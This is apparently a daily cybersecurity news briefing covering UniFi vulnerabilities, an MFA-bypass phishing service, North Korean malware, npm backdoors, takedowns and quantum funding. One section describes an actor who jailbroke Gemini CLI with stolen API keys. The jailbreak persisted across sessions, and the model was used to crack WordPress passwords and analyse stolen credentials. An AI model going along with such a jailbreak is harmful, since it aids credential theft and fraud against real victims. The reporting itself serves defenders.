☕ Good Morning Security Gang,
I hope everyone had a meaningful Memorial Day weekend.
Yesterday was one of those days that reminds you how much we take for granted. Watching children talk about fathers they lost in service to this country hits differently when you become a parent yourself. Memorial Day isn’t one day of grief for those families—it’s 365 days a year. So wherever you pray, however you reflect, remember the families carrying that sacrifice every single day and honor them not just yesterday, but all year long.
Now, while many people were off enjoying the holiday, the threat landscape absolutely was not. Today’s show is packed:
Ubiquiti dropped emergency patches for three CVSS 10 vulnerabilities
The FBI warned about a new Microsoft 365 MFA bypass phishing platform
Lazarus deployed a fully fileless in-memory RAT targeting finance and crypto firms
DPRK malware campaigns evolved to compiled binaries to evade detection
A Russian threat actor weaponized a jailbroken Gemini AI
npm packages hid Linux backdoors disguised as SSH daemons
Europol and Canadian authorities scored major takedowns
And the U.S. government just dropped $2 billion into quantum computing acceleration
Double espresso in hand. Coffee cup cheers, gang. Let’s get into it.
🧭 Executive Summary
Today’s threat landscape paints a very clear picture of where cybersecurity stands in 2026: attackers are becoming dramatically faster, stealthier, and more automated than most defensive operations are prepared for. Nation-state actors are deploying memory-only malware invisible to traditional endpoint tools, phishing-as-a-service kits are bypassing MFA without stealing passwords, and AI platforms are now actively participating in intrusion workflows.
At the same time, governments and law enforcement are escalating responses through coordinated takedowns, infrastructure seizures, and quantum computing investments. The cybersecurity battle is no longer just about malware versus antivirus, it is now about operational speed, cryptographic survival timelines, AI-assisted offense, and the future trust model of the internet itself.
📰 Top Stories & Deep Dive Analysis
"Today's stories read as one coherent threat picture: the attackers are faster, cheaper, and harder to detect than they were twelve months ago. CVSS perfect ten in Ubiquiti. MFA bypassed by a two hundred and fifty dollar subscription service. A North Korean RAT that lives purely in memory. An AI that jailbreaks itself and cracks passwords for a low-skilled Russian actor. These are not theoretical risks anymore, they are Tuesday morning's operational realities." James Azar
🚨 Ubiquiti Drops Emergency Patch for Three CVSS 10 UniFi Vulnerabilities
Ubiquiti issued emergency patches for five UniFi OS vulnerabilities, including three carrying the maximum possible CVSS score of 10.0. The flaws include:
Improper access control allowing unauthorized changes
Path traversal enabling arbitrary file reads
Command injection enabling full remote code execution without credentials required
Researchers are currently tracking approximately 100,000 internet-exposed UniFi OS endpoints globally, with nearly half located in the United States alone.
The alarming part here is not just the severity, it’s the simplicity. These are low-complexity exploits requiring no privileges and minimal attacker effort. If organizations have exposed UniFi management interfaces directly to the internet, attackers only need the IP address to begin exploitation.
Even though Ubiquiti has not publicly confirmed active exploitation yet, history tells us threat actors are almost certainly already testing and weaponizing these vulnerabilities in parallel with disclosure.
Security teams should patch immediately and move all UniFi management interfaces behind VPNs or isolated management VLANs. Internet-exposed management infrastructure continues to be one of the fastest-growing breach vectors across the industry.
🎣 FBI Warns of “Kali365” MFA Bypass Phishing Platform
The FBI issued an IC3 warning about “Kali365,” a phishing-as-a-service platform specifically designed to bypass Microsoft 365 MFA using OAuth device authorization flows.
This is what makes the platform dangerous:
👉 It does not steal passwords.
Instead, it abuses Microsoft’s legitimate device code authentication process originally designed for smart TVs, printers, and IoT devices. Victims receive legitimate-looking Microsoft login prompts and authenticate normally. MFA fires successfully. Nothing appears suspicious to the user.
Meanwhile, the attacker captures the live authentication token and immediately gains full account access.
The platform reportedly includes:
AI-generated phishing lures
Real-time victim dashboards
Automated token capture
Telegram-based operator infrastructure
Hundreds of attacks have already targeted manufacturing, healthcare, education, government, insurance, and financial sectors across North America and Europe.
This is a perfect example of attackers abusing trusted authentication workflows instead of breaking them directly. Organizations should immediately restrict or disable device code authentication flows through Microsoft Entra conditional access policies where operationally feasible.
👻 Lazarus Deploys “RemotePE” Fileless RAT
North Korea’s Lazarus Group deployed a new fileless remote access Trojan called “RemotePE,” specifically targeting cryptocurrency and financial organizations.
What makes this malware especially dangerous is that it:
Executes entirely in memory
Never writes payloads to disk
Uses Windows DPAPI tied to the victim environment
Dynamically loads additional DLL capabilities post-compromise
Traditional file-hash-based detection becomes almost useless in this model because there are no persistent files to scan.
Initial access relies heavily on social engineering via Telegram, fake trading firms, cloned Calendly domains, and fraudulent meeting invitations targeting developers and analysts.
This is another evolution in the DPRK operational model:
👉 Memory-only malware designed specifically to evade traditional EDR visibility while targeting financial ecosystems directly.
Organizations relying heavily on static file scanning without runtime memory analysis should consider this a major visibility gap.
💻 InvisibleFerret Malware Evolves Into Compiled Binary Format
A related DPRK campaign tied to the Void Dokkaebi cluster upgraded its “Invisible Ferret” malware from readable Python scripts into compiled Cython binaries designed to evade antivirus and EDR detection.
The malware still performs:
Browser credential theft
Clipboard monitoring
Keylogging
Crypto wallet targeting
Backdoor access
But by compiling the malware into native-looking binaries (.pyd and .so files), attackers bypass many detections previously focused on Python scripts.
Distribution continues through fake developer interview lures where candidates download “technical assessment packages” that silently install the malware.
This continues to reinforce a critical trend:
👉 Developers themselves are now among the highest-priority targets for nation-state operations.
🤖 Russian Threat Actor Weaponizes Jailbroken Gemini AI
One of the most fascinating stories today involved a Russian-speaking operator known as “BenCamPro,” who weaponized a jailbroken instance of Google Gemini CLI during a multi-year campaign involving WordPress compromises, credential cracking, crypto theft, and influence operations.
Using stolen Gemini API keys, the operator built a self-reinforcing jailbreak system where Gemini retained prior jailbreak instructions across sessions. The AI was then used to:
Generate password mutations
Crack WordPress admin accounts
Analyze stolen InfoStealer logs
Assist operational decision-making
Researchers linked the activity to:
29 compromised WordPress admin accounts
MAGA-themed influence operations
Crypto wallet theft campaigns
Telegram channels with over 17,000 subscribers
This is the clearest evidence yet that AI is now materially lowering the skill barrier for cybercrime operations.
AI isn’t just accelerating defenders anymore, it’s becoming operational infrastructure for attackers as well.
📦 npm Supply Chain Campaign Hides Linux Backdoor as SSH Daemon
Researchers uncovered an npm-based supply chain campaign hiding a Linux backdoor disguised as a fake SSH daemon named .sshd inside /tmp.
The malware used malicious postinstall scripts inside package.json files to:
Download binaries from attacker-controlled GitHub releases
Install them silently in background processes
Suppress errors and detection visibility
The naming convention was deliberate:
👉 During incident response, /tmp/.sshd may appear benign at first glance.
The campaign primarily targeted mixed PHP and JavaScript monorepo environments where npm lifecycle scripts execute automatically during builds.
This continues the now-familiar attacker playbook:
Poison dependencies
Exploit CI/CD trust
Persist quietly
Steal credentials
Organizations should aggressively review npm lifecycle scripts before deployment and monitor for suspicious SSH-like processes running from temporary directories.
⚖️ KimWolf Botnet Operator Arrested in Canada
Canadian authorities arrested 23-year-old Jacob Butler, allegedly the operator behind the KimWolf DDoS-for-hire botnet responsible for attacks exceeding 30 terabits per second.
The botnet reportedly infected over one million devices globally and caused individual victims losses exceeding $1 million.
The investigation relied heavily on:
IP address correlation
Financial transaction tracing
Messaging platform analysis
Infrastructure linkage
The case is another reminder that cyber attribution and operational takedowns are becoming increasingly sophisticated globally.
🇪🇺 Europol Operation Saffron Dismantles VPN Used by 25 Ransomware Groups
Europol’s Operation Saffron seized 33 servers tied to “FirstVPN,” a service allegedly used by more than 25 ransomware groups for anonymization infrastructure.
Authorities arrested the alleged Ukrainian administrator and shared over 500 user profiles with international law enforcement partners.
This operation demonstrates growing coordination between:
Europol
FBI
International cybercrime task forces
The global law enforcement ecosystem is increasingly functioning as a coordinated operational network rather than isolated national efforts.
⚛️ U.S. Government Commits $2 Billion to Quantum Computing
The Trump administration announced approximately $2 billion in grants to accelerate quantum computing development, with IBM expected to receive nearly half the funding.
“Quantum isn’t a theoretical risk. It’s a countdown clock.”
The move significantly accelerates concerns around “Q-Day”:
👉 The moment quantum systems can reliably break RSA and elliptic curve cryptography.
Researchers now estimate cryptographically relevant quantum capabilities could emerge as early as:
2027
2028
Or by 2030 depending on acceleration models
The implications are enormous:
Banking infrastructure
Military communications
TLS encryption
Cryptocurrencies
VPNs
Secure messaging
All rely heavily on cryptographic systems vulnerable to future quantum attacks.
NIST finalized post-quantum cryptographic standards last year, but many organizations still have not begun crypto-agility migration planning.
That timeline is shrinking rapidly.
🎯 Key Takeaway
👉 Attackers are increasingly operating at machine speed while defenders are still relying on human-speed processes.
🛠️ Action Items for Security Leaders
🚨 Patch UniFi OS immediately and remove management interfaces from public internet exposure
🎣 Restrict Microsoft device code authentication through conditional access policies
👻 Deploy runtime memory analysis capabilities beyond file-hash detection
💻 Brief developer teams on DPRK fake interview campaigns
🤖 Audit AI API key exposure across CI/CD environments and repositories
📦 Review npm lifecycle scripts before deployment into production pipelines
⚖️ Monitor law enforcement intelligence releases tied to ransomware infrastructure
🇪🇺 Review VPN and anonymization service usage within enterprise environments
⚛️ Begin crypto-agility inventory and post-quantum cryptography migration planning
🔍 Treat AI infrastructure and developer ecosystems as critical operational attack surfaces
🧠 James Azar’s CISOs Take
What stood out to me today is how clearly the operational gap between attackers and defenders is widening. Fileless malware, MFA bypasses using legitimate Microsoft flows, AI-assisted password cracking, and supply chain backdoors all point to one reality: attackers are optimizing around trust and automation faster than most organizations can adapt. Traditional reactive security models are struggling to keep pace with machine-speed attack operations.
The second major takeaway is that quantum computing is no longer a distant research topic, it’s now a boardroom issue. The U.S. government doesn’t invest $2 billion into quantum acceleration unless it believes the strategic race is already underway. Organizations still treating post-quantum cryptography as “future planning” are likely underestimating how quickly this timeline is compressing. Crypto agility needs to become a strategic initiative now not after the first major quantum breakthrough hits headlines.
🔥 Stay Cyber Safe.
